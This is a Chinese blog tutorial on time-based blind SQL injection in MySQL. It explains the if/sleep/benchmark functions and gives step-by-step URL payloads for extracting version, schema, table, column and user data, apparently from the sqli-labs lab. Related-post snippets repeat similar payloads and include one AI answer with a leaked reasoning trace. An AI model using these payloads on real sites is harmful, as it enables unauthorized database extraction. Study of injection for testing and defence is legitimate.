SQL注入之时间延迟型注入

最新推荐文章于 2025-03-19 22:49:39 发布
原创 最新推荐文章于 2025-03-19 22:49:39 发布 · 1.6k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql #数据库

本文详细介绍了时间延迟型SQL注入的原理、常用函数(如if, sleep, benchmark)及其应用,以及时间延迟注入的六个步骤,包括确认注入点、判断数据库信息、猜解表名和数据。此外,还分析了四种SQL注入方式的特点,强调在不同情况下选择合适的注入方法。" 125431214,11022284,深入理解JVM类加载机制,"['jvm', 'java']

时间延迟型注入

原理:利用if函数,执行判断; 如果正确,直接返回(时间很短,网速有一定影响) 如果不正确,执行时间延迟,常用的函数有sleep和benchmark 以上操作也可以反过来。
适用环境:界面无法用布尔真假判断,也无法报错注入的情况下。

时间延迟注入常用SQL函数介绍

if(condition,expr1,expr2)
功能:如果condition是true,则if()的返回值是expr1,否则返回值则为expr2,if()的返回值为数字值或字符串,具体情况视其所在语境而定
举例:select if(1+1=2,1,0);   select if(1+1=3,1,0)
      结果: 1                         ;            0

sleep(arg1)
功能:arg1为中断的时间,单位为秒;
举例1:if(payload,sleep(5),1);如果测试语句正确,暂停5秒

benchmark(arg1,arg2)
功能:arg1操作次数,arg2为表达式
举例1:if(payload,benchmark(500000000),1);如果测试语句正确,暂停5秒左右,受服务器影响较大

if和sleep的结合使用
语句:select if(left(version(),1)=5,sleep(5),2)

时间延迟SQL注入步骤

第1步:确认注入点
方法:通过增加 ' 和增加--+ 注释符,语句从执行失败变为执行成功判断注入点
语句:?id=1' --+

第2步:判断数据库版本和当前数据库名长度
1)判断数据库版本
?id=1' and if(ascii(substr(version(),0,1))=5,1,sleep(5))--+
2)判断数据库名长度
?id=1' and if(length(database())>10,1,sleep(5))--+

第3步:爆数据库名
?id=1' and if(ascii(substr((select schema_name from information_schema.schemata limit 0,1),1,1))>10,1,sleep(5))--+

第4步:猜解数据表名
?id=1' and if(ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1))>10,1,sleep(5))--+

第5步:猜解数据表 列名
?id=1' and if(ascii(substr((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1))>10,1,sleep(5))--+

第6步:猜解数据包内容
?id=1' and if(ascii(substr((select username from security.users limit 0,1),1,1))>20,1,sleep(5))--+

四种注入方式的分析

1.union注入:
能直接显示出想要的数据,使用简单

2.报错注入:
输入错误会直接显示数据库错误信息,我们可以通过报错注入直接获取想要的信息,与union注入相比,稍微麻烦一点,但是能直接显示信息

3.布尔注入:
会间接显示查询语句是否正确,但不会显示关键信息,重复操作多

4.时间注入:
不管SQL语句是否正确,不会返回任何信息,只能通过页面缓冲的时间来判断

综上所述
如果能够直接union是最好的,如果爆出了数据库错误可以使用报错注入,如果没有明显错误但是间接反馈了语句是否执行正确,可以布尔注入,如果什么信息都没有返回只有试试时间延迟注入。

DM啊瑶
关注
《网络安全自学教程》- SQL注入之时间盲注原理+步骤+实战操作
wangyuxiang946的博客
05-21 1万+
这篇文章为大家解析时间盲注的实现原理,结合实战案例讲解时间盲注的操作步骤以及时间误差的判断
SQL注入之延时注入
m0_56578216的博客
08-23 1210
延时注入就是利用sleep()函数通过if语句判断所写的语句真假,如果为真返回我们想要的东西(例如:数据库的长度,数据库的名字等)如果我们写的东西不符合则会利用sleep()函数让服务器休眠。固定的理解sleep(x) 函数的意义是关键,就是个自行设定如果判断成功那么就会延迟x秒延时注入的关键是sleep函数和if语句,通过sleep函数判断语句的真假,。
sql注入之延时注入
weixin_45653478的博客
04-09 3115
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
sql注入-延时注入】sleep()、benchmark()函数 延时注入
热门推荐
07-10 1万+
【延时注入】结合if、case when 延时注入
sql注入-延时注入
课嗨教育的专栏
04-28 1712
渗透测试基础课-课程进度_不死的小鱼的博客-优快云博客 延时注入和布尔盲注差不多 为什么要延时 因为有的时候我们知道这个地方存在注入但是页面返回信息一样 加了个if延时条件判断 if(条件,是,否) http://localhost/Less-9/index.php?id=1%27%20and%20if( 1<2,sleep(10),1)--%201 返回14秒 http://localhost/Less-9/index.php?id=1%27%20and%20if( 1>2,sleep(
封神台SQL注入-延时注入
qq_40941912的博客
10-05 488
一、原理 所谓的盲注就是在服务器没有错误回显的时候完成的注入攻击。 服务器没有错误回显,对于攻击者来说缺少了非常重要的“调试信息”。 相关函数 length() => 返回(字符串)长度的数值 substr([],[A],[B]) => 返回[]值中,[A]开始[B]位后的字符值 ascii() => 通过数值返回(此处内容)的阿斯克码 sleep() if(expr1.expr2,expr3) =>判断语句,第一个正确执行2,错误执行3 二、作业 (一) SQL注入-延时盲注 R
SQL注入手册-时间延迟注入
jdk12123的博客
09-01 2550
时间注入又名延时注入,属于盲注入的一种,通常是某个注入点无法通过布尔注入获取数据而采用一种突破注入的技巧。在 mysql 里 函数 sleep() 是延时的意思,sleep(10)就是 数据库延时 10 秒返回内容。判断注入可以使用’and sleep(10) 数据库延时 10 秒返回值 网页响应时间至少要 10 秒 根据这个原理来判断存在 SQL 时间注入。mysql 延时注入用到的函数 sleep() 、if()、substring()
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 5310
1.概念 1.延时注入:当进行盲注的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
sql注入讲解ppt.pptx
08-10
3. 时间延迟 SQL 注入:使用时间延迟注入 SQL 语句。 4. 布尔盲注:使用布尔逻辑来注入 SQL 语句。 七、SQL 注入常用知识: 1. 注释符:#、--、+ 等符号。 2. 联合查询:使用 UNION keyword 来连接两个查询...
SQL注入之时间盲注
banliyaoguai的博客
05-20 739
盲注就是在sql注入过程中,sql语句执行的选择后,选择的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。对于基于时间的盲注来说,我们构造的语句中,包含了能否影响系统运行时间的函数,根据每次页面返回的时间,判断注入的语句是否被成功执行。
sql注入靶场.zip
06-24
它模拟了各种类SQL注入漏洞,包括但不限于错误基线注入、时间基线注入、盲注、联合查询注入、堆叠查询注入等。每个挑战都设计有特定的注入点,需要利用这些点来获取敏感信息,例如数据库中的用户名、密码或其他...
SQL注入-时间盲注
dkxkl1314的博客
03-11 1061
盲注就是在SQL注入过程中,SQL语句执行后,查询到的数据不能回显到前端页面。此时,我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。时间忙住特性在页面中,不管用户输入什么,数据交互完成以后目标网站没有错误和正确的页面回显,这种情况我们可以利用时间函数来判断数据有没有在目标数据中得到执行。当然也需要构造闭合。如下图不管我们输入什么,页面显示结果都是一样的1、判断是否存在注入2、获取数据库长度3、逐字猜解数据库名4、猜解表名数量5、猜解某个表名长度6、逐字猜解表名。
4.3SQL注入之延时注入
qq_64177395的博客
09-04 1260
mid(a,b,c): 从b开始,截取a字符串的c位。substr(a,b,c): 从b开始,截取字符串a的c长度。参数描述同mid()函数,第一个参数为要处理的字符串,start为开始位置,length为截取的长度。if(a,b,c):可以理解在java程序中的三目运算符,a条件成立 执行b, 条件不成立,执行c。1.防止引号 ‘ “ 转义。
sql注入------基于时间延迟benchmark函数注入脚本
weixin_30291791的博客
11-28 495
#author:windy_2import requests urlx = 'http://127.0.0.1/?id= 1 and if((substr((select database()),' payloads = 'qwertyuiopasdfghjklzxcvbnm{}_0123456789' def guess_column(table): string = '...
sql漏洞注入——时间注入
m0_73756016的博客
11-01 2366
id=1' and if(length(database())>8,sleep(5),0)--+1’ and updatexml(1,concat(0x7e,(select database()),0x7e),1 ) --+ 页面正常。1" and updatexml(1,concat(0x7e,(select database()),0x7e),1 ) --+ 页面正常。select if(length(database())>1,sleep(5),0),这个就是查询当前库大于1,就会延时5秒执行。
SQL注入之延时盲注原理与应用
lubiii_的博客
03-19 1829
' AND (SELECT CASE WHEN (条件) THEN SLEEP(5) ELSE 0 END)--' AND (SELECT 1 FROM (SELECT SLEEP(5))a WHERE 条件)--' AND IF(条件, BENCHMARK(10000000,MD5('test')), 0)--IF(条件, BENCHMARK(10000000,MD5('a')), 0)IF(条件, SLEEP(5), 0) -- 条件为真时延时5秒。条件为真时延时,为假时触发除零错误(页面异常)。
延时注入sql-liab(9-10)
weixin_52387684的博客
11-03 430
4.延时盲注 延时盲注原理 无法利用页面显示结果判断SQL注入是否执行成功,此时可以利用SQL语句执行的延时判断SQL是否执行成 功 只要可以执行延时,那么就可以利用该注入技术 sqL时间类的盲注本质是利用插入的SQL语句执行成时间延迟,插入的SQL语句中包含延时执行的语句,当数据 库执行该语句时,会延时执行。 Mysql中常用的延时执行函数 sleep(num) benchmark(num,function) benchmark(100000000,rand()) Mysql中常用的判断结构
sql注入中时间盲注有哪些关键函数
最新发布
04-28
<think>好的,用户想了解时间盲注的关键函数和实现方法。首先,我需要回忆一下时间盲注的基本原理。时间盲注通常是在无法直接通过页面回显获取数据时,通过引入时间延迟来判断注入是否成功。所以关键点在于如何触发数据库的延迟函数。 接下来,要列举不同数据库系统中常用的时间延迟函数。比如MySQL中的SLEEP()、BENCHMARK(),PostgreSQL的PG_SLEEP(),SQL Server的WAITFOR DELAY,以及Oracle的DBMS_LOCK.SLEEP()。这些都是常见的函数,需要具体说明每个函数的用法和示例。 然后,用户可能需要知道如何构造注入语句。比如在MySQL中,使用IF条件结合SLEEP函数,根据条件是否成立来决定是否触发延迟。例如,判断数据库名的第一个字符是否为某个字母,如果是则延迟几秒。这样通过页面响应时间的长短来推断信息。 还要注意不同数据库的语法差异,比如Oracle需要FROM DUAL,而其他数据库可能不需要。同时,BENCHMARK函数是通过重复执行计算来引起延迟,可能在某些没有SLEEP函数的环境下使用。 另外,实现步骤方面,需要分步骤说明,比如判断注入点、构造条件语句、观察延迟响应等。可能还需要提到工具的使用,比如sqlmap自动化检测,但用户的问题主要是手动实现方法,所以这部分可以简要带过。 安全问题方面,需要提醒用户时间盲注的效率较低,对服务器负载有影响,并且容易被安全设备检测到。可能用户在实际测试中需要注意这些点,所以需要包括进去。 最后,生成相关问题时要围绕时间盲注的扩展,比如与布尔盲注的区别、如何防御、自动化工具的原理等。这些能帮助用户进一步理解该主题。</think>### 时间盲注关键函数及实现方法 时间盲注(Time-Based Blind SQL Injection)通过构造带有时间延迟SQL语句,根据服务器响应时间判断注入条件是否成立。以下是关键函数和实现方式: #### 一、关键延迟函数 1. **MySQL** - `SLEEP(N)`:强制等待N秒 示例:`SELECT IF(1=1,SLEEP(5),0)` - `BENCHMARK(count, expr)`:重复执行表达式引起延迟 示例:`SELECT IF(1=1,BENCHMARK(1000000,SHA1('test')),0)` 2. **PostgreSQL** - `PG_SLEEP(N)`:等待N秒 示例:`SELECT CASE WHEN 1=1 THEN PG_SLEEP(5) ELSE NULL END` 3. **SQL Server** - `WAITFOR DELAY '0:0:5'`:延迟5秒 示例:`IF 1=1 WAITFOR DELAY '0:0:5'` 4. **Oracle** - `DBMS_LOCK.SLEEP(N)`:延迟N秒 示例:`SELECT CASE WHEN 1=1 THEN DBMS_LOCK.SLEEP(5) ELSE NULL END FROM DUAL` #### 二、实现步骤 1. **判断注入点** 构造带延迟的查询,观察响应时间: ```sql ' AND IF(1=1,SLEEP(5),0)-- ``` 2. **构造条件判断** 通过条件语句逐字符提取数据: ```sql ' AND IF(SUBSTRING((SELECT DATABASE()),1,1)='a', SLEEP(5),0)-- ``` 3. **二进制搜索优化** 使用ASCII值比较缩小范围: ```sql ' AND IF(ASCII(SUBSTRING((SELECT DATABASE()),1,1))>100, SLEEP(5),0)-- ``` #### 三、防御建议 - 使用预编译语句(Prepared Statements) - 限制数据库函数权限[^1] - 部署Web应用防火墙(WAF)
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值